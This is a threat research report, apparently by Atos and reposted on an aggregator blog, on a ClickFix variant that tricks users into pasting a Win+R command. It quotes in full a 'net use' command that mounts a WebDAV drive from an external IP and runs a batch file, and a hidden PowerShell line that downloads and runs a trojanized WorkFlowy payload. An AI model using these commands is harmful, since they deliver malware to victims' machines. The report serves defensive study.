Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.
Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield
Summary
Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a “net use” command is used to map a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed. Script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside “.asar” archive. This acts as a C2 beacon and a dropper for the final malware payload.
 |
| Figure 1: High-level overview of attack flow. |
Attack overview
In this version, the initial vector of attack is the same as in all the other ones, a web page posing as a captcha mechanism – “happyglamper[.]ro”. It prompts the user to open the Run application via “Win+R”, followed by “Ctrl+V” and “Enter”
 |
| Figure 2: Phishing website 1 |
 |
| Figure 3: Phishing website 2 |
This executes the following command:
“cmd.exe” /c net use Z: http://94.156.170[.]255/webdav /persistent:no && “Z:\update.cmd” & net use Z: /deleteTypically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that “net use” is being used to map and connect to a network drive of an external server from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the next uncommon stages of infection patterns, this campaign gives Adversaries high chances to evade defensive controls and stay under the radar of defenders.
In this case, the observed ClickFix variant of execution flow successfully bypassed the detection of Microsoft Defender for Endpoint. Atos security teams were able to detect it only thanks to the internal Threat Hunting service focusing on the main behavioral aspect of the ClickFix technique – initial execution through the RunMRU registry key (hunting query available in the Appendix section).
The initial execution script “update.cmd” is loaded from the mapped drive and executed; after that, the mapped drive is removed. Content of “update.cmd”:
start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'http://94.156.170[.]255/flowy.zip' -OutFile \"$env:TEMP\dl.zip\";
Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force;
Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\""This spawns a…
Source link
Disclaimer
We strive to uphold the highest ethical standards in all of our reporting and coverage. We blogs.grocliq.com want to be transparent with our readers about any potential conflicts of interest that may arise in our work. It’s possible that some of the investors we feature may have connections to other businesses, including competitors or companies we write about. However, we want to assure our readers that this will not have any impact on the integrity or impartiality of our reporting. We are committed to delivering accurate, unbiased news and information to our audience, and we will continue to uphold our ethics and principles in all of our work. Thank you for your trust and support.
Website Upgradation is going on for any glitch kindly connect at [email protected]
